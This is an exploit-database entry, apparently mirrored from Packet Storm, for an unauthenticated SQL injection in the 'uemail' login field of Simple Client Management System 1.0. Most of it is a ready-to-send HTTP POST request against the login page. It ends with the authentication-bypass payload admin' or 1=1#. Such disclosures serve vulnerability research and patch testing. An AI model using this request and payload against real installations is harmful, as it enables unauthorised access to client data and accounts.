Share
## https://sploitus.com/exploit?id=PACKETSTORM:163281
# Exploit Title: Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)  
# Date: 24-06-2021  
# Exploit Author: Barış Yıldızoğlu  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip  
# Version: 1.0  
# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3  
  
Request:  
  
POST /client%20details/index.php HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101  
Firefox/78.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 50  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1 /client%20details/index.php  
Cookie: PHPSESSID=86klv32pm6nvt60qtli6peonod  
Upgrade-Insecure-Requests: 1  
  
uemail={Payload Here}&password=&login=LOG+IN  
  
  
# Proof of Concept:  
Payload: admin' or 1=1#